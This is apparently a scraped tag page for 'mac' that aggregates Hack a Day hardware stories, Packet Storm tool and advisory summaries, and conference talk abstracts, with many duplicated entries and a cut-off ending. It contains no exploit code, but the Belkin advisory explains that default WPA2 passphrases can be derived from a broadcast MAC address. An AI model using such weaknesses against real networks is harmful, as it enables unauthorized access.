«
Expand/Collapse
220 items tagged "mac"
Related tags:
vulnerability [+],
security [+],
mandriva linux [+],
mac os [+],
mac check [+],
device [+],
bluetooth [+],
authentication [+],
Wireless [+],
tar [+],
BackTrack [+],
socks [+],
random value [+],
linux [+],
lan adapters [+],
intercepter [+],
arp poisoning [+],
sig [+],
padding [+],
openssl [+],
nic [+],
microsoft [+],
mac address list [+],
linux security [+],
iptables [+],
ipset [+],
implementation [+],
hash [+],
harald scan [+],
bitmap data [+],
administration [+],
Newbie [+],
Area [+],
windows [+],
threaded [+],
tcp ports [+],
tcp [+],
python [+],
protocol [+],
port scanner [+],
network [+],
multi [+],
macs [+],
apple mac os x [+],
apple mac os [+],
Software [+],
wpa tkip [+],
winpcap based [+],
tool [+],
tar gz [+],
sophos [+],
service [+],
partition [+],
open ports [+],
network interface card [+],
mac osx [+],
kismet [+],
kernel [+],
fs initrandmac [+],
d link [+],
communication [+],
cisco aironet [+],
bssid [+],
arp requests [+],
apple mac [+],
Support [+],
Hardware [+],
General [+],
wpa2 [+],
wol e [+],
wol [+],
wireless routers [+],
winter martin johns tags [+],
wep [+],
web application developers [+],
web [+],
wake [+],
vulnerable versions [+],
utility [+],
usa [+],
tls server [+],
talk [+],
system memory [+],
spoof [+],
software defined radio [+],
sans [+],
ruggedcom [+],
ros [+],
request packet [+],
reply packets [+],
radio [+],
presp [+],
passphrase [+],
partition tables [+],
packet [+],
office [+],
monocle [+],
model [+],
mandriva [+],
loop [+],
linux kernels [+],
ldm [+],
layer [+],
lan hacking [+],
kismet wireless [+],
iwn [+],
ipv [+],
invalid parameters [+],
information disclosure [+],
information [+],
ifconfig [+],
idefense security advisory [+],
idefense [+],
icq [+],
icmp echo request [+],
host [+],
hidemac [+],
hardened [+],
gentoo [+],
file format converter [+],
fil [+],
excel [+],
ettercap [+],
elliptic curves [+],
edimax [+],
dissector [+],
discovery [+],
detection [+],
denial of service [+],
denial [+],
debian [+],
dd wrt [+],
csrf [+],
control mechanisms [+],
client side proxy [+],
check [+],
bypass [+],
bug [+],
buffer overflow bug [+],
belkin [+],
backdoor [+],
arp request [+],
arbitrary code execution [+],
apple computers [+],
airodump [+],
adsl router [+],
adresse mac [+],
administrative authentication [+],
Technologies [+],
21c3 [+],
12 months [+],
x insecurity [+],
x event [+],
wpa key [+],
wpa [+],
wlan [+],
wepkey [+],
way [+],
video [+],
unix variants [+],
trojan [+],
tmac [+],
tkip aes [+],
tiger [+],
technitium [+],
tcp implementations [+],
targets [+],
tablet [+],
step [+],
source release [+],
source mac address [+],
smb [+],
simon wunderlich [+],
set [+],
security advisory [+],
secunia [+],
scurit [+],
s system [+],
rtf [+],
router [+],
root [+],
rlc [+],
rachel engel scott stender [+],
python code [+],
protocol type [+],
protocol stacks [+],
protocol designers [+],
protocol address [+],
problem [+],
poc [+],
packet data services [+],
number [+],
nmb [+],
network interface card nic [+],
mon [+],
memory corruption [+],
media access control [+],
master browser [+],
malware [+],
mac linux [+],
mac font [+],
mac address changer [+],
local area network [+],
linux windows [+],
linux kernel modules [+],
linux 64bit [+],
link [+],
ldt [+],
kerberos protocol [+],
kerberos [+],
ivs [+],
integer data types [+],
incrypt [+],
iclass [+],
huawei [+],
hid [+],
header [+],
harald welte [+],
freetype [+],
free anti virus [+],
filter [+],
fabian yamaguchi [+],
exploit [+],
evolutionary step [+],
echo life [+],
design [+],
darwin [+],
cryptographic algorithm [+],
cryptanalysis [+],
cross [+],
computer [+],
code [+],
cl [+],
changer [+],
brad hill [+],
beta [+],
bash program [+],
based buffer overflow [+],
b.a.t.m.a.n [+],
authentication request [+],
authentication protocol [+],
attacker [+],
arp [+],
application crash [+],
anti [+],
angelo laub [+],
advisory [+],
adresse [+],
access [+],
ARM [+],
mac address [+],
xxxx [+],
xorg [+],
xor [+],
xcode [+],
x update [+],
x snow [+],
x recovery [+],
x port [+],
x malware [+],
x lion [+],
x compact [+],
wrap up [+],
world [+],
working [+],
wireshark [+],
wireless mice [+],
wireless keyboards [+],
wireless cards [+],
wifi [+],
web habits [+],
wearable [+],
weapon of choice [+],
wave [+],
waiting [+],
w lt [+],
vmware [+],
virus [+],
vipr [+],
vehicular [+],
using modern technology [+],
users [+],
use [+],
usb tv tuner [+],
usb [+],
throughput [+],
thanks in advance [+],
textbytesatom [+],
ted [+],
tags [+],
tablet computer [+],
sudo [+],
stuxnet [+],
strength security [+],
steven j. murdoch tags [+],
steve [+],
station [+],
static ip [+],
static [+],
standby mode [+],
stack buffer [+],
stable [+],
sourcery [+],
source mac [+],
something [+],
software windows [+],
snow leopard [+],
sms text message [+],
smart card payments [+],
smalltalk [+],
smallscript [+],
side [+],
session features [+],
service vulnerability [+],
server [+],
serious [+],
security holes [+],
securitng [+],
second [+],
screen [+],
safer use [+],
safeguard [+],
running software [+],
ruby [+],
routers [+],
rom [+],
robert [+],
rob havelt [+],
retired [+],
response packet [+],
replacement lcd [+],
renewal interval [+],
remote [+],
recruit [+],
recreating [+],
recovery partition [+],
radio release [+],
quot [+],
pwn [+],
pumpkin [+],
pt 01 [+],
protection [+],
project [+],
powerpoint [+],
power symbol [+],
power efficiency [+],
ports [+],
port [+],
point [+],
plugs [+],
platform [+],
planning [+],
pinhead [+],
pin [+],
physical memory [+],
phone [+],
phillip torrone [+],
pgp users [+],
pgp [+],
pfragments [+],
personal area network [+],
penguin [+],
pc. [+],
parameters [+],
parameter [+],
para [+],
osx [+],
os x [+],
omg [+],
old macs [+],
old [+],
offset [+],
office router [+],
network input [+],
network admin [+],
neat piece [+],
nbsp nbsp nbsp nbsp nbsp [+],
nbsp [+],
n draft [+],
my handshake [+],
multiple buffer overflow [+],
mike doell [+],
midi mapping [+],
midi [+],
microsoft powerpoint viewer [+],
microsoft office [+],
michael test [+],
michael [+],
mic key [+],
mhz channels [+],
mentor graphics [+],
medium access control [+],
max msp [+],
max [+],
mario [+],
malloc [+],
makeover [+],
make [+],
mad scientist [+],
macintosh liberation army [+],
macbook [+],
mac supports [+],
mac spoofing [+],
mac side [+],
mac se [+],
mac problem [+],
mac ports [+],
mac plus [+],
mac pin [+],
mac os x update [+],
mac os x security [+],
mac os x apple [+],
mac operating systems [+],
mac malware [+],
mac layer [+],
mac improper [+],
mac iici [+],
mac emulator [+],
mac emulation [+],
mac computer users [+],
mac clone [+],
mac chat [+],
mac based [+],
mac address filters [+],
mac address filtering [+],
locked [+],
liu [+],
list [+],
linux wireless [+],
linux development [+],
limor fried [+],
limor [+],
limitation [+],
libsecurity [+],
leopard [+],
layer 2 [+],
launches [+],
laser cutter [+],
laser [+],
language [+],
kit [+],
kernel panic [+],
jsp [+],
joseph menn [+],
jonathan rosenberg [+],
jboss [+],
java security holes [+],
java [+],
jake howe [+],
ipod [+],
ipads [+],
ipad [+],
ip ports [+],
ip list [+],
interface functions [+],
interesting security [+],
image [+],
home [+],
hero [+],
here [+],
help [+],
handshake problem [+],
halloween props [+],
halloween [+],
hacking tool [+],
hacking [+],
hacker [+],
hack contest [+],
guitar hero [+],
guitar [+],
gps satellites [+],
google [+],
gigabits [+],
gawthrop [+],
fun [+],
free anti virus software [+],
free [+],
fpga [+],
font format [+],
folder permissions [+],
flashback [+],
fios [+],
finland [+],
file [+],
fiber optics [+],
ff ff ff [+],
fast lane [+],
fashion [+],
factor [+],
exploits [+],
experiment [+],
evil [+],
everything [+],
even [+],
europe [+],
ethercap [+],
epilog laser [+],
epilog [+],
enterprise media [+],
encryption [+],
emv [+],
emulator [+],
elias [+],
echo on [+],
e ip [+],
dst [+],
don [+],
dockstar [+],
dna finland [+],
disk [+],
direct [+],
direcciones mac [+],
dhcp [+],
development [+],
developing linux applications [+],
dell optiplex gx270 [+],
dell optiplex [+],
default device [+],
debutant [+],
day [+],
david simmons [+],
darknet [+],
darklords [+],
d link router [+],
cyber criminals [+],
cutter [+],
customizable messages [+],
crt screen [+],
cross site scripting [+],
cross compiler [+],
critical security [+],
crimeware [+],
credit card fraud [+],
creation functions [+],
cracker [+],
corrosive properties [+],
controller [+],
connected computer [+],
configuring [+],
computer boots [+],
complete security [+],
compiler [+],
command execution [+],
command [+],
code execution [+],
cms [+],
client [+],
click [+],
classic [+],
cisco ime [+],
cisco [+],
chopchop [+],
chip [+],
charlie miller [+],
change [+],
card [+],
cap [+],
canada [+],
c cf [+],
business strength [+],
built [+],
buffer overflow vulnerability [+],
bruno goncalves [+],
bradley gawthrop [+],
booting [+],
bluetoothdialup [+],
bluescripts [+],
big [+],
belkin router [+],
becoming [+],
b trojan [+],
auth [+],
audio [+],
association [+],
assignement [+],
arm processor [+],
apple server [+],
apple safari [+],
apple platform [+],
anti virus software [+],
android [+],
air traffic control [+],
aime [+],
address [+],
activists [+],
access points [+],
Tools [+],
Soporte [+],
Skype [+],
ExploitsVulnerabilities [+],
Espace [+],
Discussion [+],
Angolo [+],
802.11ac [+],
68k macintosh [+],
4ghz [+],
1b channel [+],
mac addresses [+],
hacks [+],
chaos communication congress [+],
privilege escalation vulnerability [+],
sniffer [+],
mac os x [+],
apple [+],
source destination [+],
source [+],
read [+],
mptcp [+],
local privilege escalation [+],
linux kernel [+],
ip packets [+],
destination ip address [+],
destination [+],
hfs [+],
asc [+],
lan [+]
-
-
4:00
»
Hack a Day
The Macintosh SE/30 is well regarded as the choice pick of the compact Mac line. Packing a powerful 68030 processor and with the capability to use up to 128 MB of RAM, it brought serious grunt to bear in a tight form factor. With these machines now over 30 years old, they’re often quite worse for wear. [This Does Not Compute] had his work cut out for him getting this particular example up and running. (Video embedded below.)
With the computer displaying the famous SimasiMac screen on startup, it was sadly non-functional when switched on. [This Does Not Compute] went through all the usual attempts to fix this – washing the board, recapping, checking potentially broken traces – all to no avail. After much consternation, the fix was not so hard – a fresh set of RAM helped cure what ailed the Mac.
With the Mac now showing some signs of life, there was more to do. The floppy drive refused to boot, ejecting disks and failing to read anything. A head cleaning proved helpful, but not enough. It was only when the head motor’s worm gear was relubricated, enabling it to seek properly, that the drive was successfully able to boot. The hard drive proved resistant of any attempts to get it to work, so was replaced with a SCSI2SD instead.
With the suite of repairs completed, the SE/30 was once again up and running. With a little elbow grease, the case and keyboard turned up a treat, too. [This Does Not Compute] now has one of the all-time classic Macs in excellent condition.
We’ve seen some great restorations over the past – this Commodore 64 full of dirt was a particularly compelling story. Video after the break.
-
-
13:00
»
Hack a Day
Even among those of us with a penchant for repairing electronics, there are some failures which are generally considered too severe to come back from. A good example is liquid damage in a laptop; with so many components and complex circuits crammed into such a small area, making heads or tails of it once the corrosion sets in can be a real nightmare. Especially in the case of an older laptop, the conventional wisdom is to try and recover your files and then buy a new one.
But as we’ve come to learn, [Jason Gin] is not a man who often finds himself concerned with conventional wisdom. After finding an older MacBook with suspected liquid damage, he decided to see what it would take to restore it to working order. According to a note on the device, the screen was dead, the USB ports were fried, the battery didn’t take a charge, and it wouldn’t boot. No problem then, should be easy.
Upon opening up the circa-2012 laptop, [Jason] found the machine to be riddled with corrosion. We’re not just talking surface gunk either. After giving everything a good cleaning with isopropyl alcohol, the true extent of the damage became clear. Not only had traces on the PCB rotted away, but there were many components that were either damaged or missing altogether. Whatever spilled inside this poor Mac was clearly some nasty stuff.
[Jason] used OpenBoardView to pull up schematics and diagrams of the motherboard, and started the arduous task of visually comparing them to his damaged unit. In some areas, the corrosion was so bad he still had trouble locating the correct traces and pads. But with time and effort, he was able to start probing around and seeing what components had actually given up the ghost.
For the USB ports it ended up being a bad 10-microfarad ceramic capacitor, but for the LCD, he ended up having to replace the entire backlight driver IC. The prospect of working on this tiny BGA-25 device might have been enough for some to throw in the towel, but compared to the hand-soldered magnet wire repairs required elsewhere on the board, [Jason] says the installation of the new LP8550 chip was one of the easier aspects of the whole operation.
The write-up is a great read if you like a good repair success story, and we especially like the way he documented his diagnosis and resulting work on a per-system basis. It makes it much easier to understand just how many individual fires [Jason] had to put out. But if you’re more interested in feats of steady-handed soldering, check out his recent project to add a PCI-E slot to the Atomic Pi.
-
-
22:01
»
Hack a Day
The vintage Macintosh all-in-one computers were a design icon, as well as being highly useful machines in the 80s and 90s. In the decades since, they’ve been used for everything from web servers to aquariums, but that’s not all. [Arcade Jason] decided to grab an old Macintosh Plus and turn it into a vector display.
The hack starts with the opening of a Macintosh, which naturally requires a long screwdriver with the right tip. Setting the stage for things to come, this is achieved by soldering together a couple of existing tools to get the reach he needs. [Jason] then proceeds to install a brightness control for the main electron gun, as well as deflection drivers and a spot killing circuit. Everything is done with the intention of the hack being reversible, as [Jason] didn’t wish to sacrifice a good Macintosh Plus just for the sake of having some fun.
For those unfamiliar with vector cathode-ray displays and the manner in which they are driven, [Arcade Jason] does a great job explaining the basics. A set of magnetic coils is used to alter the trajectory of an electron fired at the screen. If you aim those electrons in ordered lines from left-to-right, top-to-bottom you’ve created a raster display. If you instead guide the electrons to follow the shapes you want to appear on the screen you’ve created a vector display.
We can’t help but feel this would be a hilarious way to troll at a demoscene meetup. We’ve seen [Jason]’s vector work before, too — like this impressive color Asteroids hack.
-
-
19:00
»
Hack a Day
After the immense failure of the 2013-era Apple Pro trash can Mac, Apple has been hard at work at the next generation of workstation desktops. This week, the new Mac Pro has been announced, and the specs are amazing: We finally can buy a professional, desktop Mac with half the storage of an iPhone. The big story isn’t the next generation of cheese-grater Macs, though: the new display, the Pro Display XDR, has killed the venerable VESA mount and we couldn’t be happier.
The VESA mount, or more correctly, the VESA Mounting Interface Standard, was created in 1997 as a mounting standard for flat panel monitors and televisions. Look on the back of your monitor, and you’ll probably find a pattern of M4 threaded inserts laid out on a 75mm or 100mm square. Larger sizes, with respectively larger thread sizes, are used for gigantic wall-mounted televisions. For the last two decades, this has been the standard for mounting monitors to stands. Now this standard faces a challenger thanks to the brave designers at Apple.
The new Pro Display XDR connects to the Pro Stand with a ‘puck-shaped magnetic connector’. This connector is designed to attach to the back of the Pro Display XDR and locks the Pro Stand and display together. This is a magnetic display mount, a game-changing advance in monitor mounting technology.
The new Pro Display mount allows for something not many VESA mounts are designed for: The Pro Display XDR can rotate into either portrait or landscape mode. While details are still forthcoming if this display will automatically change the display orientation in MacOS, this is something that has been possible for thirty years, the patent is absolutely expired, and anyone could build a dongle that switches between portrait and landscape mode automatically in relation to the direction of gravity.
The Apple Pro Stand goes on sale this fall, with a retail price of $999. You can tell that’s the punchline because that’s where we’re ending the article.
We’ll be waiting for the release of the Pro Display this fall, but in the meantime, get your pitchforks ready. There’s no way this display has any sort of sensor to detect which direction ‘down’ is, and you’re going to end up going into your computer’s settings to change between landscape and portrait.
-
-
19:32
»
Packet Storm Security Recent Files
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
19:32
»
Packet Storm Security Tools
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
19:32
»
Packet Storm Security Tools
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
19:32
»
Packet Storm Security Misc. Files
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
-
11:01
»
Hack a Day
We’ve tried building our own ARM cross compiler on a Linux box and it’s no picnic. Luckily there is a free cross compiling toolchain available through Mentor Graphics (formerly called Code Sourcery G++). But those looking to develop on a Mac aren’t so lucky. There is help via a script, and [Michael] wrote a guide [...]
-
-
19:03
»
Packet Storm Security Recent Files
ipset allows administration of sets of IP addresses/networks, ports, MAC addresses, and interfaces, which are stored in hash or bitmap data structures. These can then be used in conjunction with iptables to do fast presence lookups.
-
19:03
»
Packet Storm Security Tools
ipset allows administration of sets of IP addresses/networks, ports, MAC addresses, and interfaces, which are stored in hash or bitmap data structures. These can then be used in conjunction with iptables to do fast presence lookups.
-
19:03
»
Packet Storm Security Misc. Files
ipset allows administration of sets of IP addresses/networks, ports, MAC addresses, and interfaces, which are stored in hash or bitmap data structures. These can then be used in conjunction with iptables to do fast presence lookups.
-
-
13:56
»
Packet Storm Security Advisories
Having a preconfigured randomly generated WPA2-PSK passphrase for wireless routers is basically a good idea since a vendor-generated passphrase can be much more secure than most user-generated passwords. However, in the case of Belkin the default password is calculated solely based on the MAC address of the device. Since the MAC address is broadcasted with the beacon frames sent out by the device, a wireless attacker can calculate the default passphrase and then connect to the wireless network. Vulnerable versions include, but are not limited to, Belkin Surf N150 Model F7D1301v1, Belkin N900 Model F9K1104v1, Belkin N450 Model F9K1105V2, and possibly Belkin N300 Model F7D2301v1.
-
13:56
»
Packet Storm Security Recent Files
Having a preconfigured randomly generated WPA2-PSK passphrase for wireless routers is basically a good idea since a vendor-generated passphrase can be much more secure than most user-generated passwords. However, in the case of Belkin the default password is calculated solely based on the MAC address of the device. Since the MAC address is broadcasted with the beacon frames sent out by the device, a wireless attacker can calculate the default passphrase and then connect to the wireless network. Vulnerable versions include, but are not limited to, Belkin Surf N150 Model F7D1301v1, Belkin N900 Model F9K1104v1, Belkin N450 Model F9K1105V2, and possibly Belkin N300 Model F7D2301v1.
-
13:56
»
Packet Storm Security Misc. Files
Having a preconfigured randomly generated WPA2-PSK passphrase for wireless routers is basically a good idea since a vendor-generated passphrase can be much more secure than most user-generated passwords. However, in the case of Belkin the default password is calculated solely based on the MAC address of the device. Since the MAC address is broadcasted with the beacon frames sent out by the device, a wireless attacker can calculate the default passphrase and then connect to the wireless network. Vulnerable versions include, but are not limited to, Belkin Surf N150 Model F7D1301v1, Belkin N900 Model F9K1104v1, Belkin N450 Model F9K1105V2, and possibly Belkin N300 Model F7D2301v1.
-
-
21:47
»
SecDocs
Authors:
Joseph Menn Tags:
software development Event:
Chaos Communication Congress 18th (18C3) 2001 Abstract: Perl, PHP, Python, Ruby - what's the next step? SmallScript is a rich multi-paradigm dynamic language superset/dialect of Smalltalk designed by David Simmons. This new language enables modular deployment as a small, very fast, pre-emptive multi-threaded execution platform providing small components, lightweight scripting and module facilities that scale up into the traditional space occupied by classic Smalltalk. Currently running on the Windows and .NET platforms, with both Linux and Mac ports on the way, this language may give the other players quite a run for their money.
-
-
21:51
»
SecDocs
Authors:
Angelo Laub Tags:
Mac OS X Event:
Chaos Communication Congress 21th (21C3) 2004 Abstract: Some recent security problems with Mac OS X stem from the fact that Apple tries to combine the Unix security model with easy and convient usability and closed source. Showing examples from our own research we will take you on a pleasant journey to get root on almost any recent Macintosh. And of course, there will be "just one more thing". While rumors have it that Mac OS X is extremely secure due to its open-source Darwin core and the elaborate Unix security model, little is known about practical problems that hide under its hood. While the lack of serious worms and other malware for the Mac might give users a false sense of security, things aren't that pretty once you dig deeper in the system. SUID root programs, closed-source security components, and badly-chosen default settings pile up to a security nightmare waiting to happen. We will give an overview of the problems, demonstrate example code, and give you an insight into communication problems with Apple support on security issues. Both problems with Mac OS X 10.3 (Panther) and the future version 10.4 (Tiger) will be addressed. As you can expect from any decent Apple presentation, be prepared for "one more thing".
-
21:51
»
SecDocs
Authors:
Angelo Laub Tags:
Mac OS X Event:
Chaos Communication Congress 21th (21C3) 2004 Abstract: Some recent security problems with Mac OS X stem from the fact that Apple tries to combine the Unix security model with easy and convient usability and closed source. Showing examples from our own research we will take you on a pleasant journey to get root on almost any recent Macintosh. And of course, there will be "just one more thing". While rumors have it that Mac OS X is extremely secure due to its open-source Darwin core and the elaborate Unix security model, little is known about practical problems that hide under its hood. While the lack of serious worms and other malware for the Mac might give users a false sense of security, things aren't that pretty once you dig deeper in the system. SUID root programs, closed-source security components, and badly-chosen default settings pile up to a security nightmare waiting to happen. We will give an overview of the problems, demonstrate example code, and give you an insight into communication problems with Apple support on security issues. Both problems with Mac OS X 10.3 (Panther) and the future version 10.4 (Tiger) will be addressed. As you can expect from any decent Apple presentation, be prepared for "one more thing".
-
-
21:28
»
SecDocs
Authors:
Bruno Goncalves Rob Havelt Tags:
WiFi Event:
Black Hat DC 2011 Abstract: The new 802.11p standard aims to provide reliable wireless communication for vehicular environments. The P802.11p specification defines functions and services required by Wireless Access in Vehicular Environments (WAVE) conformant stations to operate in varying environments and exchange messages either without having to join a BSS or within a BSS, and defines the WAVE signaling technique and interface functions that are controlled by the 802.11 MAC. Wireless telecommunications and information exchange between roadside and vehicle systems present some interesting security implications. This talk will present an analysis of the 802.11p 5.9 GHz band Wireless Access in Vehicular Environments (WAVE) / Dedicated Short Range Communications (DSRC), Medium Access Control (MAC), and Physical Layer (PHY) Specifications of this protocol. We will present methods of analyzing network communications (GNU Radio/USRP, firmware modifications, etc.), and potential security issues in the implementation of the protocol in practical environments such as in toll road implementations, telematics systems, and other implementations.
-
8:07
»
Hack a Day
Even though the world of software defined radio started out as a Linux-only endeavor, several recent software releases have put the ball fully into the court of OS X users. [hpux735]‘s new Cocoa Radio release provides a (nearly) fully functional software defined radio for anyone with a USB TV tuner and a mac. Earlier this week, we [...]
-
-
4:00
»
Hack a Day
Many have tried to put together an easy package for running software defined radio packages on the Mac. Not many have succeeded the way [Elias]‘ port of the gqrx SDR package has. It’s simply the easiest way to get a software defined radio up and running on the mac. gqrx is a front end for the [...]
-
3:32
»
SecDocs
Tags:
hardening Linux Event:
Chaos Communication Congress 21th (21C3) 2004 Abstract: An introduction to the hardened toolchain used at the Hardened Gentoo project, which, combined with the PaX kernel, strong DAC/MAC control mechanisms and a thorough low-entry oriented user documentation provides "full scale" protection for a wide range from home users to enterprise businesses.
-
3:30
»
SecDocs
Tags:
hardening Linux Event:
Chaos Communication Congress 21th (21C3) 2004 Abstract: An introduction to the hardened toolchain used at the Hardened Gentoo project, which, combined with the PaX kernel, strong DAC/MAC control mechanisms and a thorough low-entry oriented user documentation provides "full scale" protection for a wide range from home users to enterprise businesses.
-
3:28
»
SecDocs
Tags:
hardening Linux Event:
Chaos Communication Congress 21th (21C3) 2004 Abstract: An introduction to the hardened toolchain used at the Hardened Gentoo project, which, combined with the PaX kernel, strong DAC/MAC control mechanisms and a thorough low-entry oriented user documentation provides "full scale" protection for a wide range from home users to enterprise businesses.
-
-
8:14
»
Packet Storm Security Recent Files
ipset allows administration of sets of IP addresses/networks, ports, MAC addresses, and interfaces, which are stored in hash or bitmap data structures. These can then be used in conjunction with iptables to do fast presence lookups.
-
8:14
»
Packet Storm Security Tools
ipset allows administration of sets of IP addresses/networks, ports, MAC addresses, and interfaces, which are stored in hash or bitmap data structures. These can then be used in conjunction with iptables to do fast presence lookups.
-
8:14
»
Packet Storm Security Misc. Files
ipset allows administration of sets of IP addresses/networks, ports, MAC addresses, and interfaces, which are stored in hash or bitmap data structures. These can then be used in conjunction with iptables to do fast presence lookups.
-
-
21:46
»
SecDocs
Authors:
Justus Winter Martin Johns Tags:
CSRF Event:
Chaos Communication Congress 23th (23C3) 2006 Abstract: A detailed introduction to Cross Site Request Forgery. This talk presents the fundamental cause of this vulnerability class and examples of potential attack consequences. The second half of the talk is devoted to avoiding and countering CSRF: Implementing CSRF proof session handling, transparent retrofitting of legacy applications and methods for client side protection. Cross Site Request Forgery (CSRF, a.k.a. Session Riding) attacks are public at least since 2001. However this class of web application vulnerabilities is rather obscure compared to attack vectors like Cross Site Scripting or SQL Injection. As the trend towards web applications continues and an increasing number of local programs and appliances like firewalls rely on web based frontends, the attack surface for CSRF grows continuously. While being is some cases as dangerous as e.g. Cross Site Scripting, CSRF vulnerabilities are often regarded as negligible. Moreover, this vulnerability class is often simply unknown to some web application developers. Many misconceptions on countering CSRF exist because of this obscurity. The talk will not only show how to avoid XSRF but also how NOT to do it. Furthermore, most presentations on CSRF only address attacks on cookie based session management. This talk will also cover attacks on http authentication, client side SSL and IP/Mac based access control. CSRF is an attack that targets the user rather than the web application. As long as web applications do not take measures to protect their users against this threat, it is important to investigate possibilities to implement client side mechanisms. This talk will cover a new anti-CSRF Firefox Extension, which is currently under development as well as "RequestRodeo" - a client side proxy, which was, to the best of our knowledge, the first client-side solution for protection against XSRF attacks.
-
21:46
»
SecDocs
Authors:
Justus Winter Martin Johns Tags:
CSRF Event:
Chaos Communication Congress 23th (23C3) 2006 Abstract: A detailed introduction to Cross Site Request Forgery. This talk presents the fundamental cause of this vulnerability class and examples of potential attack consequences. The second half of the talk is devoted to avoiding and countering CSRF: Implementing CSRF proof session handling, transparent retrofitting of legacy applications and methods for client side protection. Cross Site Request Forgery (CSRF, a.k.a. Session Riding) attacks are public at least since 2001. However this class of web application vulnerabilities is rather obscure compared to attack vectors like Cross Site Scripting or SQL Injection. As the trend towards web applications continues and an increasing number of local programs and appliances like firewalls rely on web based frontends, the attack surface for CSRF grows continuously. While being is some cases as dangerous as e.g. Cross Site Scripting, CSRF vulnerabilities are often regarded as negligible. Moreover, this vulnerability class is often simply unknown to some web application developers. Many misconceptions on countering CSRF exist because of this obscurity. The talk will not only show how to avoid XSRF but also how NOT to do it. Furthermore, most presentations on CSRF only address attacks on cookie based session management. This talk will also cover attacks on http authentication, client side SSL and IP/Mac based access control. CSRF is an attack that targets the user rather than the web application. As long as web applications do not take measures to protect their users against this threat, it is important to investigate possibilities to implement client side mechanisms. This talk will cover a new anti-CSRF Firefox Extension, which is currently under development as well as "RequestRodeo" - a client side proxy, which was, to the best of our knowledge, the first client-side solution for protection against XSRF attacks.
-
12:07
»
SecDocs
Authors:
Justus Winter Martin Johns Tags:
CSRF Event:
Chaos Communication Congress 23th (23C3) 2006 Abstract: A detailed introduction to Cross Site Request Forgery. This talk presents the fundamental cause of this vulnerability class and examples of potential attack consequences. The second half of the talk is devoted to avoiding and countering CSRF: Implementing CSRF proof session handling, transparent retrofitting of legacy applications and methods for client side protection. Cross Site Request Forgery (CSRF, a.k.a. Session Riding) attacks are public at least since 2001. However this class of web application vulnerabilities is rather obscure compared to attack vectors like Cross Site Scripting or SQL Injection. As the trend towards web applications continues and an increasing number of local programs and appliances like firewalls rely on web based frontends, the attack surface for CSRF grows continuously. While being is some cases as dangerous as e.g. Cross Site Scripting, CSRF vulnerabilities are often regarded as negligible. Moreover, this vulnerability class is often simply unknown to some web application developers. Many misconceptions on countering CSRF exist because of this obscurity. The talk will not only show how to avoid XSRF but also how NOT to do it. Furthermore, most presentations on CSRF only address attacks on cookie based session management. This talk will also cover attacks on http authentication, client side SSL and IP/Mac based access control. CSRF is an attack that targets the user rather than the web application. As long as web applications do not take measures to protect their users against this threat, it is important to investigate possibilities to implement client side mechanisms. This talk will cover a new anti-CSRF Firefox Extension, which is currently under development as well as "RequestRodeo" - a client side proxy, which was, to the best of our knowledge, the first client-side solution for protection against XSRF attacks.
-
-
19:59
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2012-134 - The DCP ETSI dissector could trigger a zero division. The MongoDB dissector could go into a large loop. The XTP dissector could go into an infinite loop. The AFP dissector could go into a large loop. The RTPS2 dissector could overflow a buffer. The GSM RLC MAC dissector could overflow a buffer. The CIP dissector could exhaust system memory. The STUN dissector could crash. The EtherCAT Mailbox dissector could abort. The CTDB dissector could go into a large loop. This advisory provides the latest version of Wireshark which is not vulnerable to these issues.
-
19:59
»
Packet Storm Security Recent Files
Mandriva Linux Security Advisory 2012-134 - The DCP ETSI dissector could trigger a zero division. The MongoDB dissector could go into a large loop. The XTP dissector could go into an infinite loop. The AFP dissector could go into a large loop. The RTPS2 dissector could overflow a buffer. The GSM RLC MAC dissector could overflow a buffer. The CIP dissector could exhaust system memory. The STUN dissector could crash. The EtherCAT Mailbox dissector could abort. The CTDB dissector could go into a large loop. This advisory provides the latest version of Wireshark which is not vulnerable to these issues.
-
19:59
»
Packet Storm Security Misc. Files
Mandriva Linux Security Advisory 2012-134 - The DCP ETSI dissector could trigger a zero division. The MongoDB dissector could go into a large loop. The XTP dissector could go into an infinite loop. The AFP dissector could go into a large loop. The RTPS2 dissector could overflow a buffer. The GSM RLC MAC dissector could overflow a buffer. The CIP dissector could exhaust system memory. The STUN dissector could crash. The EtherCAT Mailbox dissector could abort. The CTDB dissector could go into a large loop. This advisory provides the latest version of Wireshark which is not vulnerable to these issues.
-
-
17:00
»
SecuriTeam
Microsoft Office for Mac is prone to a local privilege-escalation vulnerability.
-
-
14:57
»
SecDocs
Authors:
Simon Wunderlich Tags:
wireless Event:
Chaos Communication Congress 24th (24C3) 2007 Abstract: Kernel hacking definitely is the queen of coding but in order to bring mesh routing that one vital step further we had to conquer this, for us, unchartered territory. Working in the kernel itself is a tough and difficult task to manage, but the results and effectivity to be gained justify the long and hard road to success. We took on the mission to go down that road and the result is B.A.T.M.A.N. advanced which is a kernel land implementation of the B.A.T.M.A.N. mesh routing protocol specifically designed to manage Wireless MANs. During the last years the number of deployed mesh networks has increased dramatically and their constant growth drove us around the edge of what we thought was possible. To cope with this rapid development we had to leave the slow and limited track of tweaking existing approaches and take an evolutionary step forward by porting the B.A.T.M.A.N. protocol into the kernel land and going down to layer 2. Using B.A.T.M.A.N. advanced as a showcase we will, in our lecture, deliver a detailed review on how one can go about developing linux kernel modules, give insights in what difficulties to expect and provide practical tips on how to go about this challenge without experiencing a damaging kernel freeze in due process. We will describe what problems we faced migrating down to layer 2 and how we went about solving them for example how we moved away from the kernel routing and handle the actual routing and data transport in B.A.T.M.A.N. itself. Also moving to layer 2 meant to leave IPs behind and solely rely on MAC-routing enabling features like 